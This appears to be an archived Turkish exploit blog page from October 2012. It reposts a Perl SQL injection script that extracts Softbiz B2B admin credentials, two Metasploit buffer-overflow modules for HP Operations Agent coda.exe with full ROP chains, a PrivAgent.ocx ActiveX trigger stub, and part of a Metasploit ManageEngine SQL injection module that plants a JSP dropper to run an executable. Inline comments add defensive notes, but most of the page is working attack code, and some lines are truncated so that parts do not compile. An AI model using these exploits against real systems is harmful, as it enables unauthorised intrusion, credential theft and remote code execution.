Archive for 29 Ekim 2012

Softbiz B2B shopping Sql Injection Exploit (perl)

Softbiz B2B shopping için bir SQL Injection açığı bulunmuş olup Perl exploit'i ve açığın oluşumu şu şekildedir.

#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
#0     _                   __           __       __                     1 
#1   /' \            __  /'__`\        /\ \__  /'__`\                   0 
#0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
#1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 
#0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 
#1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 
#0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 
#1                  \ \____/ >> Exploit database separated by exploit   0 
#0                   \/___/          type (local, remote, DoS, etc.)    1 
#1                                                                      1 
#0  [+] Site            : 1337day.com                                   0 
#1  [+] Support e-mail  : submit[at]1337day.com                         1 
#0                                                                      0 
#1               #########################################              1 
#0               I'm Caddy-dz member from Inj3ct0r Team                 1 
#1               #########################################              0 
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 
 
#### 
# Exploit Title: Softbiz B2B shopping sql injection Exploit (perl) 
# Author: Caddy-Dz 
# Facebook Page: .Cyber.Army 
# E-mail:   
# Category:: webapps 
# Google Dork: inurl:buyers_subcategories.php 
# Security Risk: High 
# Tested on: Windows Seven Edition Integral / French 
#### 
# 
# Greets : 1337day Team , Exploit-ID Team , Algerian Cyber Army Team , KedAns-Dz , Kalashincov3 
# .. Kha&mix , King Of Pirates , xDZx-Team ... and all algerian hackers . 
# 
# this was written for educational purpose only. use it at your own risk. 
# author will be not responsible for any damage caused! user assumes all responsibility  
# intended for authorized web application pentesting only! 
 
 
 
 
# LWP::Simple is loaded but never used; every request below goes through LWP::UserAgent.
use LWP::Simple;
use LWP::UserAgent;

# cls / title / color are cmd.exe built-ins (consistent with "Tested on: Windows" in
# the header); on other platforms these calls simply fail and are ignored.
system('cls');
system('title Softbiz B2B shopping sql injection');
system('color a');


# Argument-count guard. NOTE(review): the operand before `<` is missing in this
# listing (as is the right-hand side of the list assignment further down), so the
# script does not compile as printed.
if( < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
# Prints the two accepted invocation forms: host and path are separate arguments
# and the host is given without a scheme.
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 site.com / \n";
print "[+] Note ! : do not use (http://) and make space between host and path like the exemple";
}
 
print  "\n****************************************************\n";
print  "\n*                coded by Caddy-Dz                 *\n";
print  "\n*        email: islam_babia[at]hotmail.co          *\n";
print  "\n* Fb Page: .Cyber.Army *\n";
print  "\*****************************************************\n";
# NOTE(review): the right-hand side of this assignment is missing in this listing.
# Only $Target and $path are read afterwards; $file_vuln and $sql_query are
# re-declared with `my` just below and shadow these globals.
($Target, $path,$file_vuln, $sql_query,) = ;

# Injection point: the IndustryID GET parameter of buyers_subcategories.php (the
# "Google Dork" in the header). The UNION wraps LoginID:Password from the admin
# table in 0x23 ('#') markers so the regex below can pick it out of the page.
# Defensive note: a numeric id like this should be cast or bound server-side, and
# "union select ... concat(0x23" in this parameter is an unambiguous IDS/WAF signature.
my $file_vuln = "/buyers_subcategories.php?IndustryID=-56";
my $sql_query = '+union+select+1,2,concat(0x23,LoginID,0x3a,Password,0x23)+from+admin--';
my $url = "http://" . $Target . $path . $file_vuln . $sql_query;
print "\n wait!!! \n\n";

# One GET with a 10-second timeout. On a 2xx reply the first "#user:pass#" match is
# printed; the captures are greedy (.*), so a body with several '#' characters can
# swallow more than the credential pair. Anything else prints an error line.
my $request   = HTTP::Request->new(GET=>$url);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response  = $useragent->request($request);
if ($response->is_success) {
my $res   = $response->content;
if ($res =~ m/[#](.*):(.*)[#]/g) {
my ($username,$password) = ($1,$2);
print "[+] $username:$password \n\n";
}
else { print "[-] Error, Fail to get admin login.\n\n"; }
}
else { print "[-] Error, ".$response->status_line."\n\n";
}

HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow

HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow remote exploit

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
        Rank = NormalRanking

        include Msf::Exploit::Remote::Tcp
        include Msf::Exploit::Remote::Seh

        # Module metadata for the coda.exe opcode 0x8c overflow (CVE-2012-2020 /
        # ZDI-12-115). Two targets are declared: index 0 (XP SP3) is a plain SEH
        # overwrite, index 1 (2003 SP2, the default) adds a ROP chain for DEP
        # bypass. 'Privileged' => true declares the resulting session as privileged.
        # NOTE(review): no 'License' key is set, unlike the ManageEngine module on
        # this page which passes MSF_LICENSE.
        def initialize
                super(
                        'Name'        => 'HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow',
                        'Description'    => %q{
                                        This module exploits a buffer overflow vulnerability in HP Operations Agent for
                                Windows. The vulnerability exists in the HP Software Performance Core Program
                                component (coda.exe) when parsing requests for the 0x8c opcode. This module has
                                been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and
                                Windows 2003 SP2 (DEP bypass).

                                The coda.exe components runs only for localhost by default, network access must be
                                granted through its configuration to be remotely exploitable. On the other hand it
                                runs on a random TCP port, to make easier reconnaissance a check function is
                                provided.
                        },
                        'Author'      => [
                                'Luigi Auriemma', # Vulnerability discovery
                                'juan vazquez' # Metasploit module
                        ],
                        'Platform'    => 'win',
                        'References'  =>
                                [
                                        [ 'CVE', '2012-2020' ],
                                        [ 'OSVDB', '83674' ],
                                        [ 'BID', '54362' ],
                                        [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-115/' ]
                                ],
                        'Payload'        =>
                                {
                                        'Space'          => 1024,
                                        'BadChars'       => "",
                                        'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment # add esp, -3500
                                        'DisableNops'    => true
                                },
                        'Targets'     =>
                                [
                                        [ 'HP Operations Agent 11.00 / Windows XP SP3',
                                                {
                                                        'Ret'    => 0x100e79eb, # ppr from OvSecCore.dll
                                                        'Offset' => 2084
                                                }
                                        ],
                                        [ 'HP Operations Agent 11.00 / Windows 2003 SP2',
                                                {
                                                        'Ret'       => 0x10073c2c, # stackpivot # ADD ESP,404 # RETN from OvSecCore.dll
                                                        'Offset'    => 2084,
                                                        'RopOffset' => 36
                                                }
                                        ]
                                ],
                        'DefaultTarget'  => 1,
                        'Privileged'     => true,
                        'DisclosureDate' => 'Jul 09 2012'
                )

        end

        # Random 32-bit little-endian value built from n alpha bytes; used as a
        # don't-care slot in the ROP chain. NOTE(review): for n < 4, unpack("V")
        # yields nil and .to_i turns that into 0; the default n=4 is always used here.
        def junk(n=4)
                return rand_text_alpha(n).unpack("V")[0].to_i
        end

        # Four NOP bytes reinterpreted as a little-endian dword (ROP no-op slot).
        def nop
                return make_nops(4).unpack("V")[0].to_i
        end

        # Fingerprints the agent from the BBC ping reply alone: Unknown when there is
        # no reply or no "200 OK", Vulnerable/Safe when the server header carries
        # "coda 11.<minor>" (minor < 2 is treated as vulnerable), Detected when a
        # coda banner has no parsable version, and Safe for any other banner.
        def check

                res = ping

                if not res
                        return Exploit::CheckCode::Unknown
                end

                if res !~ /HTTP\/1\.1 200 OK/
                        return Exploit::CheckCode::Unknown
                end

                # The unescaped '.' after "11" matches any character, not only a dot.
                if res =~ /server:.*coda 11.(\d+)/
                        minor = $1.to_i
                        if minor < 2
                                return Exploit::CheckCode::Vulnerable
                        else
                                return Exploit::CheckCode::Safe
                        end
                end

                if res =~ /server:.*coda/
                        return Exploit::CheckCode::Detected
                end

                return Exploit::CheckCode::Safe

        end

        # Sends a BBC "Ping" request and returns the raw reply, or nil if nothing
        # arrives within get_once's 1-second timeout. The heredoc body must stay at
        # column 0: <<-eos only allows the terminator to be indented, it does not
        # strip indentation from the body. Defensive note: the non-standard "Ping"
        # method, the BBC ping URI and the fixed user-agent string are distinctive
        # enough to serve as network-detection signatures for this reconnaissance.
        def ping

                ping_request = <<-eos
Ping /Hewlett-Packard/OpenView/BBC/ping/ HTTP/1.1
cache-control: no-cache
connection: close
content-length: 0
content-type: application/octetstream
host: #{rhost}:#{rport}
pragma: no-cache
targetid: unknown
targeturi: http://#{rhost}:#{rport}/Hewlett-Packard/OpenView/BBC/ping/
user-agent: BBC 11.00.044; coda unknown version

                eos

                connect
                sock.put(ping_request)
                res = sock.get_once(-1, 1)
                disconnect

                return res

        end

        # Pings the host, opens the Coda HTTP endpoint with "Expect: 100-continue" and
        # chunked transfer-encoding, then sends one chunk carrying the 0x8c request and
        # the overflow buffer. Defensive note: the chunk size is emitted as bare hex
        # (to_s(16)) with no terminating zero-length chunk, and targeturi wraps the
        # host in square brackets — both are usable on-the-wire indicators.
        def exploit

                peer = "#{rhost}:#{rport}"

                print_status "#{peer} - Ping host..."
                res = ping
                if not res or res !~ /HTTP\/1\.1 200 OK/ or res !~ /server:.*coda/
                        print_error("#{peer} - Host didn't answer correctly to ping")
                        return
                end

                connect

                http_headers = <<-eos
GET /Hewlett-Packard/OpenView/Coda/ HTTP/1.1
cache-control: no-cache
content-type: application/octetstream
expect: 100-continue
host: #{rhost}:#{rport}
pragma: no-cache
targetid: unknown
targeturi: http://[#{rhost}]:#{rport}/Hewlett-Packard/OpenView/Coda/
transfer-encoding: chunked
user-agent: BBC 11.00.044;  14

                eos

                print_status("#{peer} - Sending HTTP Expect...")
                sock.put(http_headers)
                res = sock.get_once(-1, 1)
                if not res or res !~ /HTTP\/1\.1 100 Continue/
                        print_error("#{peer} - Failed while sending HTTP Expect Header")
                        # NOTE(review): returns while the socket from connect above is
                        # still open; presumably the Tcp mixin's cleanup closes it — confirm.
                        return
                end

                # Six big-endian dwords; index 3 is the opcode. A 16-bit length and the
                # buffer itself are appended after the target-specific branch below.
                coda_request = [
                        0x0000000e,
                        0xffffffff,
                        0x00000000,
                        0x0000008c, # Operation 0x8c
                        0x00000002,
                        0x00000002
                ].pack("N*")

                # Target 0 (XP): SEH overwrite only. Target 1 (2003): DEP bypass, see
                # the module description.
                if target.name =~ /Windows XP/
                        bof = rand_text(target['Offset'])
                        bof << generate_seh_record(target.ret)
                        bof << payload.encoded
                        bof << rand_text(4000) # Allows to trigger exception
                else # Windows 2003
                        rop_gadgets =
                                [
                                        0x77bb2563, # POP EAX # RETN
                                        0x77ba1114, # <- *&VirtualProtect()
                                        0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
                                        junk,
                                        0x77bb0c86, # XCHG EAX,ESI # RETN
                                        0x77bc9801, # POP EBP # RETN
                                        0x77be2265, # ptr to 'push esp #  ret'
                                        0x77bb2563, # POP EAX # RETN
                                        0x03C0990F,
                                        0x77bdd441, # SUB EAX, 03c0940f  (dwSize, 0x500 -> ebx)
                                        0x77bb48d3, # POP EBX, RET
                                        0x77bf21e0, # .data
                                        0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
                                        0x77bbfc02, # POP ECX # RETN
                                        0x77bef001, # W pointer (lpOldProtect) (-> ecx)
                                        0x77bd8c04, # POP EDI # RETN
                                        0x77bd8c05, # ROP NOP (-> edi)
                                        0x77bb2563, # POP EAX # RETN
                                        0x03c0984f,
                                        0x77bdd441, # SUB EAX, 03c0940f
                                        0x77bb8285, # XCHG EAX,EDX # RETN
                                        0x77bb2563, # POP EAX # RETN
                                        nop,
                                        0x77be6591, # PUSHAD # ADD AL,0EF # RETN
                                ].pack("V*")
                        bof = Rex::Text.pattern_create(target['RopOffset'])
                        bof << rop_gadgets
                        bof << payload.encoded
                        my_payload_length =  target['RopOffset'] + rop_gadgets.length + payload.encoded.length
                        bof << rand_text(target['Offset'] - my_payload_length)
                        bof << generate_seh_record(target.ret)
                        bof << rand_text(4000) # Allows to trigger exception
                end

                coda_request << [bof.length].pack("n")
                coda_request << bof

                # Single chunk: "<hex size>\r\n<data>\r\n\r\n" — no "0\r\n\r\n" terminator.
                http_body = coda_request.length.to_s(16)
                http_body << "\x0d\x0a"
                http_body << coda_request
                http_body << "\x0d\x0a\x0d\x0a"

                print_status("#{peer} - Triggering overflow...")
                sock.put(http_body)

                disconnect
        end

end

HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow

HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow remote exploit

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
        Rank = NormalRanking

        include Msf::Exploit::Remote::Tcp
        include Msf::Exploit::Remote::Seh

        # Module metadata for the coda.exe opcode 0x34 overflow (CVE-2012-2019 /
        # ZDI-12-114). Apart from the opcode and references this module is identical
        # to the 0x8c one above it on this page: index 0 (XP SP3) is a plain SEH
        # overwrite, index 1 (2003 SP2, the default) adds a ROP chain for DEP bypass.
        # 'Privileged' => true declares the resulting session as privileged.
        # NOTE(review): no 'License' key is set, unlike the ManageEngine module below.
        def initialize
                super(
                        'Name'        => 'HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow',
                        'Description'    => %q{
                                        This module exploits a buffer overflow vulnerability in HP Operations Agent for
                                Windows. The vulnerability exists in the HP Software Performance Core Program
                                component (coda.exe) when parsing requests for the 0x34 opcode. This module has
                                been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and
                                Windows 2003 SP2 (DEP bypass).

                                The coda.exe components runs only for localhost by default, network access must be
                                granted through its configuration to be remotely exploitable. On the other hand it
                                runs on a random TCP port, to make easier reconnaissance a check function is
                                provided.
                        },
                        'Author'      => [
                                'Luigi Auriemma', # Vulnerability discovery
                                'juan vazquez' # Metasploit module
                        ],
                        'Platform'    => 'win',
                        'References'  =>
                                [
                                        [ 'CVE', '2012-2019' ],
                                        [ 'OSVDB', '83673' ],
                                        [ 'BID', '54362' ],
                                        [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-114/' ]
                                ],
                        'Payload'        =>
                                {
                                        'Space'          => 1024,
                                        'BadChars'       => "",
                                        'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment # add esp, -3500
                                        'DisableNops'    => true
                                },
                        'Targets'     =>
                                [
                                        [ 'HP Operations Agent 11.00 / Windows XP SP3',
                                                {
                                                        'Ret'    => 0x100e79eb, # ppr from OvSecCore.dll
                                                        'Offset' => 2084
                                                }
                                        ],
                                        [ 'HP Operations Agent 11.00 / Windows 2003 SP2',
                                                {
                                                        'Ret'       => 0x10073c2c, # stackpivot # ADD ESP,404 # RETN from OvSecCore.dll
                                                        'Offset'    => 2084,
                                                        'RopOffset' => 36
                                                }
                                        ]
                                ],
                        'DefaultTarget'  => 1,
                        'Privileged'     => true,
                        'DisclosureDate' => 'Jul 09 2012'
                )

        end

        # Random 32-bit little-endian value built from n alpha bytes; used as a
        # don't-care slot in the ROP chain. NOTE(review): for n < 4, unpack("V")
        # yields nil and .to_i turns that into 0; the default n=4 is always used here.
        def junk(n=4)
                return rand_text_alpha(n).unpack("V")[0].to_i
        end

        # Four NOP bytes reinterpreted as a little-endian dword (ROP no-op slot).
        def nop
                return make_nops(4).unpack("V")[0].to_i
        end

        # Fingerprints the agent from the BBC ping reply alone: Unknown when there is
        # no reply or no "200 OK", Vulnerable/Safe when the server header carries
        # "coda 11.<minor>" (minor < 2 is treated as vulnerable), Detected when a
        # coda banner has no parsable version, and Safe for any other banner.
        def check

                res = ping

                if not res
                        return Exploit::CheckCode::Unknown
                end

                if res !~ /HTTP\/1\.1 200 OK/
                        return Exploit::CheckCode::Unknown
                end

                # The unescaped '.' after "11" matches any character, not only a dot.
                if res =~ /server:.*coda 11.(\d+)/
                        minor = $1.to_i
                        if minor < 2
                                return Exploit::CheckCode::Vulnerable
                        else
                                return Exploit::CheckCode::Safe
                        end
                end

                if res =~ /server:.*coda/
                        return Exploit::CheckCode::Detected
                end

                return Exploit::CheckCode::Safe

        end

        # Sends a BBC "Ping" request and returns the raw reply, or nil if nothing
        # arrives within get_once's 1-second timeout. The heredoc body must stay at
        # column 0: <<-eos only allows the terminator to be indented, it does not
        # strip indentation from the body. Defensive note: the non-standard "Ping"
        # method, the BBC ping URI and the fixed user-agent string are distinctive
        # enough to serve as network-detection signatures for this reconnaissance.
        def ping

                ping_request = <<-eos
Ping /Hewlett-Packard/OpenView/BBC/ping/ HTTP/1.1
cache-control: no-cache
connection: close
content-length: 0
content-type: application/octetstream
host: #{rhost}:#{rport}
pragma: no-cache
targetid: unknown
targeturi: http://#{rhost}:#{rport}/Hewlett-Packard/OpenView/BBC/ping/
user-agent: BBC 11.00.044; coda unknown version

                eos

                connect
                sock.put(ping_request)
                res = sock.get_once(-1, 1)
                disconnect

                return res

        end

        # Pings the host, opens the Coda HTTP endpoint with "Expect: 100-continue" and
        # chunked transfer-encoding, then sends one chunk carrying the 0x34 request and
        # the overflow buffer. Defensive note: the chunk size is emitted as bare hex
        # (to_s(16)) with no terminating zero-length chunk, and targeturi wraps the
        # host in square brackets — both are usable on-the-wire indicators.
        def exploit

                peer = "#{rhost}:#{rport}"

                print_status "#{peer} - Ping host..."
                res = ping
                if not res or res !~ /HTTP\/1\.1 200 OK/ or res !~ /server:.*coda/
                        print_error("#{peer} - Host didn't answer correctly to ping")
                        return
                end

                connect

                http_headers = <<-eos
GET /Hewlett-Packard/OpenView/Coda/ HTTP/1.1
cache-control: no-cache
content-type: application/octetstream
expect: 100-continue
host: #{rhost}:#{rport}
pragma: no-cache
targetid: unknown
targeturi: http://[#{rhost}]:#{rport}/Hewlett-Packard/OpenView/Coda/
transfer-encoding: chunked
user-agent: BBC 11.00.044;  14

                eos

                print_status("#{peer} - Sending HTTP Expect...")
                sock.put(http_headers)
                res = sock.get_once(-1, 1)
                if not res or res !~ /HTTP\/1\.1 100 Continue/
                        print_error("#{peer} - Failed while sending HTTP Expect Header")
                        # NOTE(review): returns while the socket from connect above is
                        # still open; presumably the Tcp mixin's cleanup closes it — confirm.
                        return
                end

                # Six big-endian dwords; index 3 is the opcode. A 16-bit length and the
                # buffer itself are appended after the target-specific branch below.
                coda_request = [
                        0x0000000e,
                        0xffffffff,
                        0x00000000,
                        0x00000034, # Operation 0x34 (the original comment said 0x8c, copied from the sibling module)
                        0x00000002,
                        0x00000002
                ].pack("N*")

                # Target 0 (XP): SEH overwrite only. Target 1 (2003): DEP bypass, see
                # the module description.
                if target.name =~ /Windows XP/
                        bof = rand_text(target['Offset'])
                        bof << generate_seh_record(target.ret)
                        bof << payload.encoded
                        bof << rand_text(4000) # Allows to trigger exception
                else # Windows 2003
                        rop_gadgets =
                                [
                                        0x77bb2563, # POP EAX # RETN
                                        0x77ba1114, # <- *&VirtualProtect()
                                        0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
                                        junk,
                                        0x77bb0c86, # XCHG EAX,ESI # RETN
                                        0x77bc9801, # POP EBP # RETN
                                        0x77be2265, # ptr to 'push esp #  ret'
                                        0x77bb2563, # POP EAX # RETN
                                        0x03C0990F,
                                        0x77bdd441, # SUB EAX, 03c0940f  (dwSize, 0x500 -> ebx)
                                        0x77bb48d3, # POP EBX, RET
                                        0x77bf21e0, # .data
                                        0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
                                        0x77bbfc02, # POP ECX # RETN
                                        0x77bef001, # W pointer (lpOldProtect) (-> ecx)
                                        0x77bd8c04, # POP EDI # RETN
                                        0x77bd8c05, # ROP NOP (-> edi)
                                        0x77bb2563, # POP EAX # RETN
                                        0x03c0984f,
                                        0x77bdd441, # SUB EAX, 03c0940f
                                        0x77bb8285, # XCHG EAX,EDX # RETN
                                        0x77bb2563, # POP EAX # RETN
                                        nop,
                                        0x77be6591, # PUSHAD # ADD AL,0EF # RETN
                                ].pack("V*")
                        bof = Rex::Text.pattern_create(target['RopOffset'])
                        bof << rop_gadgets
                        bof << payload.encoded
                        my_payload_length =  target['RopOffset'] + rop_gadgets.length + payload.encoded.length
                        bof << rand_text(target['Offset'] - my_payload_length)
                        bof << generate_seh_record(target.ret)
                        bof << rand_text(4000) # Allows to trigger exception
                end

                coda_request << [bof.length].pack("n")
                coda_request << bof

                # Single chunk: "<hex size>\r\n<data>\r\n\r\n" — no "0\r\n\r\n" terminator.
                http_body = coda_request.length.to_s(16)
                http_body << "\x0d\x0a"
                http_body << coda_request
                http_body << "\x0d\x0a\x0d\x0a"

                print_status("#{peer} - Triggering overflow...")
                sock.put(http_body)

                disconnect
        end

end

Aladdin Knowledge System Ltd – PrivAgent.ocx ChooseFilePath BOF

Antivirüslerce Yutulmaktadır.

 <!-- Instantiates the PrivAgent.ocx control by its CLSID; only the object tag survives on this page (the note above says the rest is stripped by antivirus). Mitigation: set the ActiveX kill bit for this CLSID so the browser refuses to load the control. -->
 <object id="pwnd" classid="clsid:09F68A41-2FBE-11D3-8C9D-0008C7D901B6"></object>

ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection

ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection açığı bulundu.
Açığa ilişkin exploit:

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
        Rank = ExcellentRanking

        include Msf::Exploit::Remote::HttpClient
        include Msf::Exploit::EXE

        # Module metadata for the unauthenticated SQL injection in the Security
        # Manager Plus advanced-search page (EDB 22094 / BID 56138). Target 0
        # ('Automatic') is resolved at runtime by pick_target; RPORT defaults to 6262.
        # NOTE(review): throughout this listing the `@`-prefixed instance variables
        # appear to have been stripped (bare ` << outpath`, `if .nil?`, `['Platform']`),
        # so the class does not parse as printed.
        def initialize(info={})
                super(update_info(info,
                        'Name'           => "ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection",
                        'Description'    => %q{
                                        This module exploits a SQL injection found in ManageEngine Security Manager Plus
                                advanced search page, which results in remote code execution under the context of
                                SYSTEM in Windows; or as the user in Linux.  Authentication is not required in order
                                to exploit this vulnerability.
                        },
                        'License'        => MSF_LICENSE,
                        'Author'         =>
                                [
                                        'xistence <xistence[at]0x90.nl>',  # Discovery & Metasploit module
                                        'sinn3r',                          # Improved Metasploit module
                                        'egypt'                            # Improved Metasploit module
                                ],
                        'References'     =>
                                [
                                        ['EDB','22094'],
                                        ['BID', '56138']
                                ],
                        'Platform'       => ['win', 'linux'],
                        'Targets'        =>
                                [
                                        ['Automatic', {}],
                                        ['Windows',   { 'Arch' => ARCH_X86, 'Platform' => 'win'   }],
                                        ['Linux',     { 'Arch' => ARCH_X86, 'Platform' => 'linux' }]
                                ],
                        'DefaultTarget'  => 0,
                        'Privileged'     => false,
                        'DisclosureDate' => "Oct 18 2012"))

                register_options(
                        [
                                OptPort.new('RPORT', [true, 'The target port', 6262])
                        ], self.class)
        end


        # Error-based check: a single random letter as the search value that yields
        # "Error during search" is taken as the sign of an injectable query (Appears),
        # anything else is Safe. Defensive note: the surfaced error text is the oracle;
        # hiding database errors from responses removes this check's signal, but only
        # a parameterised query removes the injection itself.
        def check
                res = sqli_exec(Rex::Text.rand_text_alpha(1))

                if res and res.body =~ /Error during search/
                        return Exploit::CheckCode::Appears
                else
                        return Exploit::CheckCode::Safe
                end
        end


        # Resolves the 'Automatic' target by writing the database version into a
        # text file under the webapp directory (MySQL "into outfile") and fetching it
        # back over HTTP: "-enterprise-nt" selects Windows, plain "-enterprise" Linux,
        # anything else returns nil. NOTE(review): the receiver before ` << outpath`
        # and the lone `@` in the select list are truncated in this listing.
        # Defensive note: this technique needs the DB account to hold the FILE
        # privilege and the DB server to be able to write into the webapp directory;
        # revoking FILE and setting secure_file_priv blocks it.
        def pick_target
                return target if target.name != 'Automatic'

                rnd_num   = Rex::Text.rand_text_numeric(1)
                rnd_fname = Rex::Text.rand_text_alpha(5) + ".txt"
                outpath   = "../../webapps/SecurityManager/#{rnd_fname}"

                 << outpath

                # Array#* with a String joins, so this appends "2,3,...,28" — presumably
                # padding the UNION to the column count of the original query.
                sqli  = "#{rnd_num})) union select @,"
                sqli << (2..28).map {|e| e} * ","
                sqli << " into outfile \"#{outpath}\" FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}"
                sqli_exec(sqli)

                res = send_request_raw({'uri'=>"/#{rnd_fname}"})

                # What @ returns:
                # Linux   = 5.0.36-enterprise
                # Windows = 5.0.36-enterprise-nt

                if res and res.body =~ /\d\.\d\.\d\d\-enterprise\-nt/
                        print_status("#{rhost}:#{rport} - Target selected: #{targets[1].name}")
                        return targets[1]  # Windows target
                elsif res and res.body =~ /\d\.\d\.\d\d\-enterprise/
                        print_status("#{rhost}:#{rport} - Target selected: #{targets[2].name}")
                        return targets[2]
                end

                return nil
        end


        #
        # We're in SecurityManager/bin at this point
        #
        # Post-session cleanup: deletes every file dropped into the webapp directory
        # (the receiver of `.each` below is missing in this listing), via the
        # Meterpreter file API when available and a shell rm/del otherwise.
        # NOTE(review): `rescue ::Exception` also swallows SignalException and
        # SystemExit; a bare `rescue => e` (StandardError) is the safer form here.
        def on_new_session(cli)
                if target['Platform'] == 'linux'
                        print_warning("Malicious executable is removed during payload execution")
                end

                if cli.type == 'meterpreter'
                        cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
                end

                .each { |f|
                        base = File.basename(f)
                        f = "../webapps/SecurityManager/#{base}"
                        print_warning("#{rhost}:#{rport} - Deleting: \"#{base}\"")

                        begin
                                if cli.type == 'meterpreter'
                                        cli.fs.file.rm(f)
                                else
                                        del_cmd = (['Platform'] == 'linux') ? 'rm' : 'del'
                                        f = f.gsub(/\//, '\\') if ['Platform'] == 'win'
                                        cli.shell_command_token("#{del_cmd} \"#{f}\"")
                                end

                                print_good("#{rhost}:#{rport} - \"#{base}\" deleted")
                        rescue ::Exception => e
                                print_error("Unable to delete: #{e.message}")
                        end
                }
        end


        #
        # Embeds our executable in JSP
        #
        # Builds a JSP dropper: the native payload is embedded base64, decoded with
        # sun.misc.BASE64Decoder, written to a temp file and executed; on Linux it is
        # chmod 777'd first and removed 200 ms after launch. Newlines and tabs are
        # stripped and the result is hex-encoded so inject_exec can inject it as an
        # unquoted 0x... literal. NOTE(review): the receivers before .arch/.platform,
        # the bare ['Platform'] lookups and the JSP page directives (`<% import=`)
        # all look truncated in this listing. Defensive note: a new .jsp under
        # webapps/SecurityManager referencing BASE64Decoder and
        # Runtime.getRuntime().exec is a high-signal file-integrity/AV indicator.
        def generate_jsp_payload
                opts                = {:arch => .arch, :platform => .platform}
                native_payload      = Rex::Text.encode_base64(generate_payload_exe(opts))
                native_payload_name = Rex::Text.rand_text_alpha(rand(6)+3)
                ext                 = (['Platform'] == 'win') ? '.exe' : '.bin'

                var_raw     = Rex::Text.rand_text_alpha(rand(8) + 3)
                var_ostream = Rex::Text.rand_text_alpha(rand(8) + 3)
                var_buf     = Rex::Text.rand_text_alpha(rand(8) + 3)
                var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3)
                var_tmp     = Rex::Text.rand_text_alpha(rand(8) + 3)
                var_path    = Rex::Text.rand_text_alpha(rand(8) + 3)
                var_proc2   = Rex::Text.rand_text_alpha(rand(8) + 3)

                if ['Platform'] == 'linux'
                        var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)
                        chmod = %Q|
                        Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path});
                        Thread.sleep(200);
                        |

                        var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)
                        cleanup = %Q|
                        Thread.sleep(200);
                        Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path});
                        |
                else
                        chmod   = ''
                        cleanup = ''
                end

                jsp = %Q|
                <% import="java.io.*"%>
                <% import="sun.misc.BASE64Decoder"%>

                <%
                byte[] #{var_raw} = null;
                BufferedOutputStream #{var_ostream} = null;
                try {
                        String #{var_buf} = "#{native_payload}";

                        BASE64Decoder #{var_decoder} = new BASE64Decoder();
                        #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());

                        File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}");
                        String #{var_path} = #{var_tmp}.getAbsolutePath();

                        #{var_ostream} = new BufferedOutputStream(new FileOutputStream(#{var_path}));
                        #{var_ostream}.write(#{var_raw});
                        #{var_ostream}.close();
                        #{chmod}
                        Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
                        #{cleanup}
                } catch (Exception e) {
                }
                %>
                |

                # Only \n and \t are removed; space indentation in the template would survive.
                jsp = jsp.gsub(/\n/, '')
                jsp = jsp.gsub(/\t/, '')

                jsp.unpack("H*")[0]
        end

        # Posts the advanced-search request with `sqli_string` in the `value_1` field
        # (condition OpenPorts / operator IN) to persistence.jsp under a random
        # STATE_ID, carrying a fixed STATE_COOKIE; returns send_request_cgi's response.
        # Defensive note: this endpoint, the IN-operator search field and the constant
        # "_TIME/31337" cookie fragment are usable WAF/IDS signatures; the application
        # fix is a bound parameter list for the IN clause.
        def sqli_exec(sqli_string)
                cookie  = 'STATE_COOKIE=&'
